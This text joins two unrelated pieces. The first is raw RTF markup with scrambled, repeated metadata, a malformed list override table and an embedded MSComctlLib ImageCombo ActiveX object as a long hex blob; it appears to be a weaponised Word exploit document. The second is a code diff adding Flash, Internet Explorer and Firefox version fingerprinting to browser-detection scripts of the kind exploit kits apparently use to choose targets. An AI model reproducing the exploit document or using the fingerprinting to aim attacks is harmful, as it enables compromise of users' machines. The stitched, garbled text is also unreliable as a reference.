sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}evtim\yr2014\mo3\dy8\hr3\min9}\nofcharsws69}{\operator ismail - [2010]}{{\revtim\yr2014\mo3\dy8\hr3\min9}\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}\info{\a{\revtim\yr2014\mo3\dy8\hr3\min9}uthor isma{\creatim\yr2014\mo3\dy8{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}\hr3\min9}il - [2010]}14\mo3\dy8\hr3\{\*\company home}min9}evtim\yr{\no{\revtim\yr2014{\*\company home}\mo3\dy8\hr3\min9}fcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
{\*\company home}s{\revtim\yr2014\mo3\dy8\hr3\min9}id8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}2014\mo3\dy8\{{\creatim\yr201{\*\company home}4\{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}mo3\dy8\hr3\min9}\revtim\yr2014\mo3\dy8\hr3\min9}hr3\min9}f1{{\inf{\creatim\yr2014\mo3\dy8\hr3\min9}{\*\company home}o{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}{\a{\info{\no{\*\company home}fcharsws69}{\ope{\*\company home}rator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}{\author ismai{\r{\no{\revtim\yr2014\mo3\dy8\hr3\min9}fcharsws69}{\oper{\creatim\y{\creatim\yr2014\mo3\dy8\hr3\min9}r2014\mo3\dy8\hr3\min9}ator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}evtim\yr2014\mo3\dy8\hr3\min9}l - [2010]}uthor isma{\*\company home{\info{\author ismail - [2010]}}il - [2010]}\*\list{{\creat{\{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}im\yr2014{\revtim\yr2014\mo3\dy8\hr3\min9}\mo3\dy8\hr3\min9}\*\company home}{\revti{\*\company home}m\yr2014\mo3\dy8\hr3\min9}{\revtim\yr2014\mo3\dy8\h{\creatim\yr2014\mo3\dy8\hr3\min9}r3\mi{\creatim\yr2014\mo3\dy{\nofcharsws69}{\operator ismail - [2010]}{\*
|
||||||
|
sidtbl
|
||||||
|
sid8596814
|
||||||
|
sid8926214
|
||||||
|
sid10110685}{\leveltext\leveltemplateid67698693'01\u-3929 ?;}8\hr3\min9}n9}overridetable{\listoverride\listid1094795585\listoverridecount25
|
||||||
|
{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}{\lfolevel}
|
||||||
|
{\lfolevel\listoverridestartat\listoverrideformat{\listlevel\levelnfc0\levelnfcn249\leveljc0\leveljcn0\levelfollow39\levelstartat31611\levelegal1\levelnorestart0\levelpicture1\levelold0\levelprev1\levelprevspace1\levelspace22873\levelindent23130}}
|
||||||
|
{\lfolevel\listoverridestartat\listoverrideformat{\listlevel\levelnfc0\levelnfcn249\leveljc0\leveljcn0\levelfollow39\levelstartat31611\levelegal1\levelnorestart0\levelpicture1\levelold0\levelprev1\levelprevspace1\levelspace22873\levelindent23130}}
|
||||||
|
{\lfolevel\listoverridestartat\listoverrideformat{\listlevel\levelnfc0\levelnfcn232\leveljc0\leveljcn0\levelfollow39\levelstartat31611\levelegal1\levelnorestart1\levelpicture1\levelold1\levelprev1\levelprevspace1\levelspace22873\levelindent23130{\leveltext\'ff\u-48831 ?\u48831 ?;}{\levelnumbers\'5A'‰dY'ï¸X';}\chbrdr\brdrnone\brdrcf1\chshdng0\chcfpat1\chcbpat1\f4\rtlch\fcs1 \af0 \ltrch\fbias0 \s69\hres1\chhres1\fi-361\li1081\lin6480\jclisttab\tx1081}}
|
||||||
|
{\lfolevel\listoverridestartat\listoverrideformat{\listlevel\levelnfc0\levelnfcn249\leveljc0\leveljcn0\levelfollow39\levelstartat31611\levelegal1\levelnorestart0\levelpicture1\levelold0\levelprev1\levelprevspace1\levelspace22873\levelindent23130{\levelnumbers\'92ZDCBA„Y';}}}
|
||||||
|
{\lfolevel\listoverridestartat\listoverrideformat{\listlevel\levelnfc0\levelnfcn194\leveljc0\leveljcn3\levelfollow39\levelstartat31611\levelegal1\levelnorestart0\levelpicture1\levelold0\levelprev1\levelprevspace1\levelspace22873\levelindent23130{\levelnumbers\'5C'ÎÂX'ABCD;}}}
|
||||||
|
{\lfolevel}{\lfolevel}{\lfolevel}
|
||||||
|
\ls16962}}
|
||||||
|
{\object\objocx\f37\objsetsize\objw1500\objh749{\*\objclass MSComctlLib.ImageComboCtl.2}{\*\objdata 01050000020000001c000000
|
||||||
|
4d53436f6d63746c4c69622e496d616765436f6d626f43746c2e32000000000000000000001e0000
|
||||||
|
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000b00000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
fffffffffffffffffdffffff0d000000030000000400000005000000060000000700000008000000090000000a000000fefffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000066a69ddd9485d111b16a00c0f0283628000000000000000000000000e01c
|
||||||
|
bb4913f3cd010c000000000100000000000003005000520049004e005400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e000201ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
|
||||||
|
000000000000000002000000ae1000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
|
||||||
|
0000000000000000000000000000060000000000000003004f00430058004e0041004d00450000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000
|
||||||
|
000000000000000000000000010000001a000000000000000800560aca0200000100090000035308000006008806000000008806000026060f00060d574d464301000000000001007ed80000000001000000e40c000000000000e40c0000010000006c0000000000000000000000630000001a0000000000000000000000
|
||||||
|
560a0000ca02000020454d4600000100e40c000038000000070000000000000000000000000000000004000000030000690100000f0100000000000000000000000000001c830500552204000c0000001000000000000000000000000a000000100000000000000000000000180000000c00000000000000190000000c00
|
||||||
|
0000ffffff00260000001c0000000100000000000000000000000000000000000000250000000c0000000100000027000000180000000200000000000000ffffff0000000000250000000c00000002000000520000007001000003000000f1ffffff00000000000000000000000090010000000000000000000043006100
|
||||||
|
6c006900620072006900000001000000cdabbadc0b000000d86a24000000ea07f4000000985e4877a87bad0600000000f400000030b7ea07d4b7ea070000df0550745f76f06a2400e362647600000000d46824008d885f7640692400e3626476b9a64bf1feffffffff705f76fc175f7680f08f0046000000000000000c18
|
||||||
|
5f7600000000000000001c00000054692400b86924002e648c774869240030000000f06a2400e0638c7780f08f004600000000000000fa0366000000000000000000050000004e0000007f133f1320340000cad55b27a9705f76002de575009b5b27fa0366000000000003000000050000004e0000001000000054000000
|
||||||
|
0000df0503000000050000005100000015000000d57b5f76f59a5b27de094e00000000000000000000000000000000007c664e77106a24009d3948777c664e776476000800000000250000000c000000030000002b000000180000000000000000000000630000001a0000001e0000001800000000000000000000006400
|
||||||
|
00001b000000520000007001000004000000f1ffffff0000000000000000000000009001000000000000000000004d006900630072006f0073006f00660074002000530061006e007300200053006500720069006600000000000000000000000000000000000000000000000000000032002e0030005c0030005c007700
|
||||||
|
69006e0033003200000043002d003100f1ffffff000000000000000000000000900100000000000000000000430061006c006900620072006900000001000000cdabbadc0b000000d86a24000000ea07f4000000985e4877a87bad0600000000f400000030b7ea07d4b7ea070000df0500005f76f06a2400e36264760000
|
||||||
|
0000d46824008d885f7640692400e3626476b9a64bf1feffffffff705f76fc175f7680f08f0046000000000000000c185f7600000000000000001c00000054692400b86924002e648c774869240030000000f06a2400e0638c7780f08f004600000000000000fa0366000000000000000000647600080000000025000000
|
||||||
|
0c00000004000000520000007001000005000000120000000000000000000000000000009001000000000000000000004d006900630072006f0073006f00660074002000530061006e0073002000530065007200690066000000000000000000000000000000000000000000000000000000000000000000000032002e00
|
||||||
|
30005c0030005c00770069006e0033003200000043002d003100f1ffffff000000000000000000000000900100000000000000000000430061006c006900620072006900000001000000cdabbadc0b000000d86a24000000ea07f4000000985e4877a87bad0600000000f400000030b7ea070000ea070000df0500005f76
|
||||||
|
f06a2400e362647600000000d46824008d885f7640692400f09f320010a032009cc724000bb44f7720a03200d89853770000200200002002efb0a1770400000000000000080c2002d8ec2002ccc7240068b2a17737122125c0c7240028c9240020c92400000000000400000000000000fcc7240064760008000000002500
|
||||||
|
00000c00000005000000250000000c00000003000000280000000c00000004000000280000000c00000005000000520000007001000005000000f1ffffff0000000000000000000000009001000000000000000000004d006900630072006f0073006f00660074002000530061006e007300200053006500720069006600
|
||||||
|
0000000000000000000000000000000000000000000000000000a60600000000000000000000000000000000000000000000000000000000f1ffffff000000000000000000000000900100000000000000000000430061006c006900620072006900000001000000cdabbadc0b000000d86a24000000ea07f4000000985e
|
||||||
|
4877a87bad0600000000f400000030b7ea07d4b7ea070000df0500005f76f06a2400e362647600000000d46824008d885f7640692400e3626476b9a64bf1feffffffff705f76fc175f7680f08f0046000000000000000c185f7600000000000000001c00000054692400b86924002e648c774869240030000000f06a2400
|
||||||
|
e0638c7780f08f004600000000000000fa03660000000000000000006476000800000000250000000c00000005000000520000007001000004000000120000000000000000000000000000009001000000000000000000004d006900630072006f0073006f00660074002000530061006e00730020005300650072006900
|
||||||
|
660000000000000000000000000000000000000000000000000000000000000000000000a60600000000000000000000000000000000000000000000000000000000f1ffffff000000000000000000000000900100000000000000000000430061006c006900620072006900000001000000cdabbadc0b000000d86a2400
|
||||||
|
0000ea07f4000000985e4877a87bad0600000000f400000030b7ea070000ea070000df0500005f76f06a2400e362647600000000d46824008d885f76406924007842ae069842ae069cc724000bb44f77a842ae06d89853770000200200002002efb0a1770400000000000000080c2002d8ec2002ccc7240068b2a1773712
|
||||||
|
2125c0c7240028c9240020c92400000000000400000000000000fcc724006476000800000000250000000c00000004000000250000000c000000030000005400000054000000000000000400000063000000150000000100000000040d4255250d42f7ffffff04000000010000004c000000000000000000000000000000
|
||||||
|
ffffffffffffffff500000002000000075000000160000000c00000001000000120000000c000000010000001b000000100000000000000000000000160000000c00000000000000250000000c0000000400000054000000540000000000000000000000ffffffffffffffff0100000000040d4255250d42f7ffffff0400
|
||||||
|
0000010000004c000000000000000000000000000000ffffffffffffffff500000000700000008000000520000007001000006000000120000000000000000000000000000009001000000000000000000004d006900630072006f0073006f00660074002000530061006e00730020005300650072006900660000000000
|
||||||
|
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120000000000000000000000000000009001000000000000000000004d006900630072006f0073006f00660074002000530061006e007300200053006500720069006600000000000000
|
||||||
|
00000000000000000000000000000000000000000000000000000000a60600000000000000000000000000000000000000000000000000000000f1ffffff000000000000000000000000900100000000000000000000000061006c006900620072006900000001000000cdabbadc0b000000d86a24000000ea07f4000000
|
||||||
|
985e4877a87bad0600000000f400000030b7ea070000ea076476000800000000250000000c00000006000000250000000c00000004000000280000000c00000006000000250000000c0000000300000054000000a8000000000000000400000063000000150000000100000000040d4255250d42ffffffff040000000f00
|
||||||
|
00004c000000000000000000000000000000ffffffffffffffff6c00000049006d0061006700650043006f006d0062006f00430074006c00200031000000040000000c00000007000000070000000800000008000000080000000c000000080000000800000008000000050000000400000003000000070000001b000000
|
||||||
|
100000000000000000000000160000000c00000000000000120000000c00000002000000280000000c00000005000000280000000c000000040000004b000000100000000000000005000000250000000c0000000d000080250000000c00000000000080280000000c00000002000000250000000c000000070000802800
|
||||||
|
00000c00000001000000190000000c000000ffffff00180000000c000000000000000a0000001000000000000000000000000c000000100000000000000000000000090000001000000001000000010000000b0000001000000001000000010000000e000000140000000000000010000000140000000400000003010800
|
||||||
|
050000000b0200000000050000000c0214004b0005000000090200000000050000000102ffffff0008000000fa0200000000000000000000040000002d01000007000000fc020000ffffff000000040000002d0101001c000000fb02f1ff0000000000009001000000000000000043616c696272690001003f3f0b003f24
|
||||||
|
003ff4003f3f3f3f0000f4003f3f3f3f040000002d010200070000001b041b00640000000000040000002c0100000700000016041b006400000000001c000000fb02f1ff000000000000900100000000000000004d6963726f736f66742053616e73205365726966000000000000000000000000040000002d0103001c00
|
||||||
|
0000fb021200000000000000900100000000000000004d6963726f736f66742053616e73205365726966000000000000000000000000040000002d010400040000002d01020004000000f001030004000000f00104001c000000fb02f1ff000000000000900100000000000000004d6963726f736f66742053616e732053
|
||||||
|
65726966000000000000000000000000040000002d0103001c000000fb021200000000000000900100000000000000004d6963726f736f66742053616e73205365726966000000000000000000000000040000002d010400040000002d01020009000000320a0400f7ff0100000020007500040000002e01010004000000
|
||||||
|
0201010005000000140200000000040000002e010000040000002d01040009000000320a0400f7ff01000000070008001c000000fb021200000000000000900100000000000000004d6963726f736f66742053616e73205365726966000000000000000000000000040000002d010500040000002d01040004000000f001
|
||||||
|
0500040000002d0102001e000000320a0400ffff0f000000496d616765436f6d626f43746c20310004000c00070007000800080008000c000800080008000500040003000700040000002e010000040000000201020004000000f001030004000000f0010400040000002c0100001c000000fb021000070000000000bc02
|
||||||
|
000000000102022253797374656d003f00003f3f3f3f3f3f3f3f3f3f0800000001003f3f3f3f3f00040000002d01030007000000fc020000ffffff000000040000002d01040004000000f001010008000000fa0200000000000000000000040000002d01010004000000f0010000050000000102ffffff00050000000902
|
||||||
|
000000000300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fefffffffeffffff03000000feffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00920300040000000000000000000000000000000000
|
||||||
|
00000000000000000000000000000000000000000000000000000000000000000000000000000000000049006d0061006700650043006f006d0062006f0031000000000000000000000000000000000000000000000000000000000000000000000000000000000000002143341208000000560a0000ca0200000324a055
|
||||||
|
0000060044000000000000000000000001efcdab0000050000000000060000000800008005000080b0303a0310000000070049006d0061006700650043006f006d0062006f00430074006c0020003100000000001fdeecbd0100050040cf2400000000000000000000000000000000000000000000000000000000000000
|
||||||
|
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000043006f006e00740065006e007400
|
||||||
|
730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000020000007400000000000000000000000000000000000000
|
||||||
|
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000
|
||||||
|
050000000d0000004d45544146494c455049435400560a0000d7faffff8a0200000800560a29050000
|
||||||
|
0100090000034101000004001100000000001100000026060f001800ffffffff00001000b004000030fdffffcc0800004c0100000900000026060f000800ffffffff020000001000000026060f001600ffffffff04000e00544e50500700a8623d50390586000a00000026060f000a00544e505000000200f00309000000
|
||||||
|
26060f000800ffffffff030000000f00000026060f001400544e505004000c00010000000100000000000000050000000b0230fdb004050000000c021c041c0409000000fa02050000000000ffffff002200040000002d01000007000000fc020100000000000000040000002d01010009000000fa020600080000000000
|
||||||
|
00022200040000002d01020007000000fc020000ffffff020000040000002d010300050000000902ffffff020400000004010d00070000001b044c01cc0830fdb004050000000902ff003302040000002d010000040000002d01010004000000f001020004000000f0010300030000001e000700000016043400b4074efe
|
||||||
|
ce0509000000fa02060040000000ff0033022200040000002d0102000500000014024efece050500000013022c00ac07040000002d010000040000002d01010004000000f0010200040000002701ffff040000002d010000040000002d010100030000001e000700000016043400b4074efece0509000000fa0206004000
|
||||||
|
0000ff0033022200040000002d0102000500000014024efeac070500000013022c00ce05040000002d010000040000002d01010004000000f0010200040000002701ffff0f00000026060f001400544e505004000c000000000000000000000000000900000026060f000800ffffffff01000000040000002d0100000400
|
||||||
|
00002d010100030000000000}}}}}}}}}}}}}}}}}}}}}}}
|
|
@ -46,6 +46,53 @@ window.misc_addons_detect.hasSilverlight = function () {
|
||||||
return found;
|
return found;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Returns the Adobe Flash version
|
||||||
|
**/
|
||||||
|
window.misc_addons_detect.getFlashVersion = function () {
|
||||||
|
var foundVersion = null;
|
||||||
|
|
||||||
|
//
|
||||||
|
// Gets the Flash version by using the GetVariable function via ActiveX
|
||||||
|
//
|
||||||
|
try {
|
||||||
|
var ax = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').toString();
|
||||||
|
foundVersion = ax.match(/[\d,]+/g)[0].replace(/,/g, '.')
|
||||||
|
} catch (e) {}
|
||||||
|
|
||||||
|
//
|
||||||
|
// This should work fine for most non-IE browsers
|
||||||
|
//
|
||||||
|
if (foundVersion == null) {
|
||||||
|
var mimes = window.navigator.mimeTypes;
|
||||||
|
for (var i=0; i<mimes.length; i++) {
|
||||||
|
var pluginDesc = mimes[i].enabledPlugin.description.toString();
|
||||||
|
var m = pluginDesc.match(/Shockwave Flash [\d\.]+/g);
|
||||||
|
if (m != null) {
|
||||||
|
foundVersion = m[0].match(/\d.+/g)[0];
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
//
|
||||||
|
// Detection for Windows + Firefox
|
||||||
|
//
|
||||||
|
if (foundVersion == null) {
|
||||||
|
var pluginsCount = navigator.plugins.length;
|
||||||
|
for (i=0; i < pluginsCount; i++) {
|
||||||
|
var pluginName = navigator.plugins[i].name;
|
||||||
|
var pluginVersion = navigator.plugins[i].version;
|
||||||
|
if (/Shockwave Flash/.test(pluginName) && pluginVersion != undefined) {
|
||||||
|
foundVersion = navigator.plugins[i].version;
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return foundVersion;
|
||||||
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Returns the Java version
|
* Returns the Java version
|
||||||
**/
|
**/
|
||||||
|
|
|
@ -196,8 +196,7 @@ window.os_detect.getVersion = function(){
|
||||||
if (!ua_version || 0 == ua_version.length) {
|
if (!ua_version || 0 == ua_version.length) {
|
||||||
ua_is_lying = true;
|
ua_is_lying = true;
|
||||||
}
|
}
|
||||||
} else if (!document.all && navigator.taintEnabled ||
|
} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
|
||||||
'MozBlobBuilder' in window) {
|
|
||||||
// Use taintEnabled to identify FF since other recent browsers
|
// Use taintEnabled to identify FF since other recent browsers
|
||||||
// implement window.getComputedStyle now. For some reason, checking for
|
// implement window.getComputedStyle now. For some reason, checking for
|
||||||
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
|
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
|
||||||
|
@ -213,7 +212,11 @@ window.os_detect.getVersion = function(){
|
||||||
// Thanks to developer.mozilla.org "Firefox for developers" series for most
|
// Thanks to developer.mozilla.org "Firefox for developers" series for most
|
||||||
// of these.
|
// of these.
|
||||||
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
|
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
|
||||||
if (css_is_valid('image-orientation',
|
if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) {
|
||||||
|
ua_version = '28.0';
|
||||||
|
} else if (css_is_valid('cursor', 'cursor', 'grab')) {
|
||||||
|
ua_version = '27.0';
|
||||||
|
} else if (css_is_valid('image-orientation',
|
||||||
'imageOrientation',
|
'imageOrientation',
|
||||||
'0deg')) {
|
'0deg')) {
|
||||||
ua_version = '26.0';
|
ua_version = '26.0';
|
||||||
|
@ -874,12 +877,60 @@ window.os_detect.getVersion = function(){
|
||||||
os_flavor = "7";
|
os_flavor = "7";
|
||||||
os_sp = "SP1";
|
os_sp = "SP1";
|
||||||
break;
|
break;
|
||||||
|
case "9016502":
|
||||||
|
// IE 9.0.8112.16502 / Windows 7 SP1
|
||||||
|
ua_version = "9.0";
|
||||||
|
os_flavor = "7";
|
||||||
|
os_sp = "SP1";
|
||||||
|
break;
|
||||||
|
case "9016506":
|
||||||
|
// IE 9.0.8112.16506 / Windows 7 SP1
|
||||||
|
ua_version = "9.0";
|
||||||
|
os_flavor = "7";
|
||||||
|
os_sp = "SP1";
|
||||||
|
break;
|
||||||
|
case "9016514":
|
||||||
|
// IE 9.0.8112.16514 / Windows 7 SP1
|
||||||
|
ua_version = "9.0";
|
||||||
|
os_flavor = "7";
|
||||||
|
os_sp = "SP1";
|
||||||
|
break;
|
||||||
|
case "9016520":
|
||||||
|
// IE 9.0.8112.16520 / Windows 7 SP1
|
||||||
|
ua_version = "9.0";
|
||||||
|
os_flavor = "7";
|
||||||
|
os_sp = "SP1";
|
||||||
|
break;
|
||||||
|
case "9016526":
|
||||||
|
// IE 9.0.8112.16526 / Windows 7 SP1
|
||||||
|
ua_version = "9.0";
|
||||||
|
os_flavor = "7";
|
||||||
|
os_sp = "SP1";
|
||||||
|
break;
|
||||||
|
case "9016533":
|
||||||
|
// IE 9.0.8112.16533 / Windows 7 SP1
|
||||||
|
ua_version = "9.0";
|
||||||
|
os_flavor = "7";
|
||||||
|
os_sp = "SP1";
|
||||||
|
break;
|
||||||
case "10016720":
|
case "10016720":
|
||||||
// IE 10.0.9200.16721 / Windows 7 SP1
|
// IE 10.0.9200.16721 / Windows 7 SP1
|
||||||
ua_version = "10.0";
|
ua_version = "10.0";
|
||||||
os_flavor = "7";
|
os_flavor = "7";
|
||||||
os_sp = "SP1";
|
os_sp = "SP1";
|
||||||
break;
|
break;
|
||||||
|
case "11016428":
|
||||||
|
// IE 11.0.9600.16428 / Windows 7 SP1
|
||||||
|
ua_version = "11.0";
|
||||||
|
os_flavor = "7";
|
||||||
|
os_sp = "SP1";
|
||||||
|
break;
|
||||||
|
case "10016384":
|
||||||
|
// IE 10.0.9200.16384 / Windows 8 x86
|
||||||
|
ua_version = "10.0";
|
||||||
|
os_flavor = "8";
|
||||||
|
os_sp = "SP0";
|
||||||
|
break;
|
||||||
case "1000":
|
case "1000":
|
||||||
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
|
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
|
||||||
ua_version = "10.0";
|
ua_version = "10.0";
|
||||||
|
@ -894,7 +945,32 @@ window.os_detect.getVersion = function(){
|
||||||
if (!ua_version) {
|
if (!ua_version) {
|
||||||
// The ScriptEngine functions failed us, try some object detection
|
// The ScriptEngine functions failed us, try some object detection
|
||||||
if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
|
if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
|
||||||
|
// IE 11 detection, see: http://msdn.microsoft.com/en-us/library/ie/bg182625(v=vs.85).aspx
|
||||||
|
try {
|
||||||
|
if (document.__proto__ != undefined) { ua_version = "11.0"; }
|
||||||
|
} catch (e) {}
|
||||||
|
|
||||||
|
// IE 10 detection using nodeName
|
||||||
|
if (!ua_version) {
|
||||||
|
try {
|
||||||
|
var badNode = document.createElement && document.createElement("badname");
|
||||||
|
if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; }
|
||||||
|
} catch(e) {}
|
||||||
|
}
|
||||||
|
|
||||||
|
// IE 9 detection based on a "Object doesn't support property or method" error
|
||||||
|
if (!ua_version) {
|
||||||
|
try {
|
||||||
|
document.BADNAME();
|
||||||
|
} catch(e) {
|
||||||
|
if (e.message.indexOf("BADNAME") > 0) {
|
||||||
|
ua_version = "9.0";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
// IE8 detection straight from IEBlog. Thank you Microsoft.
|
// IE8 detection straight from IEBlog. Thank you Microsoft.
|
||||||
|
if (!ua_version) {
|
||||||
try {
|
try {
|
||||||
ua_version = "8.0";
|
ua_version = "8.0";
|
||||||
document.documentElement.style.display = "table-cell";
|
document.documentElement.style.display = "table-cell";
|
||||||
|
@ -903,6 +979,7 @@ window.os_detect.getVersion = function(){
|
||||||
// but not IE8, regardless of mode
|
// but not IE8, regardless of mode
|
||||||
ua_version = "7.0";
|
ua_version = "7.0";
|
||||||
}
|
}
|
||||||
|
}
|
||||||
} else if (document.compatMode) {
|
} else if (document.compatMode) {
|
